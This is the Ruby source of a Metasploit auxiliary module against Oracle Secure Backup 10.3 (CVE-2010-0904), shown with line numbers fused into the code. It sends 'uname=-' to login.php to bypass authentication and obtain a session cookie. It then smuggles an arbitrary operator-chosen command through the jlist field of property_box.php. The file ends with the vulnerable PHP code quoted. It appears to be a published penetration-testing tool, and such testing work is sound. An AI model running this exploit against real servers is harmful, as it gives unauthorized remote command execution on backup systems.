Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr3.rb
19514 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',13'Description' => %q{14This module exploits an authentication bypass vulnerability15in login.php in order to execute arbitrary code via a command injection16vulnerability in property_box.php. This module was tested17against Oracle Secure Backup version 10.3.0.1.0 (Win32).18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'References' => [22[ 'CVE', '2010-0904' ],23[ 'OSVDB', '66338'],24[ 'ZDI', '10-118' ],25],26'DisclosureDate' => '2010-07-13',27'Notes' => {28'Stability' => [CRASH_SAFE],29'SideEffects' => [IOC_IN_LOGS],30'Reliability' => []31}32)33)3435register_options(36[37Opt::RPORT(443),38OptString.new('CMD', [ false, 'The command to execute.', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt' ]),39OptBool.new('SSL', [true, 'Use SSL', true]),40]41)42end4344def run45cmd = datastore['CMD']4647res = send_request_cgi(48{49'uri' => '/login.php',50'data' => 'attempt=1&uname=-',51'method' => 'POST'52}, 553)5455if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)5657print_status("Sending command: #{datastore['CMD']}...")5859send_request_cgi(60{61'uri' => '/property_box.php',62'data' => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),63'cookie' => res.get_cookies,64'method' => 'POST'65}, 566)6768print_status('Done.')69else70print_error('Invalid PHPSESSION token..')71return72end73end74end75=begin76else if (strcmp($type, "Job") == 0)77{78if (!is_array($objectname))79$objectname = array();80reset($objectname);81while (list(,$oname) = each($objectname))82{83$oname = escapeshellarg($oname);84$jlist = "$jlist $oname";85}86if (strlen($jlist) > 0)87$msg = exec_qr("$rbtool lsjob -lrRLC $jlist");88=end899091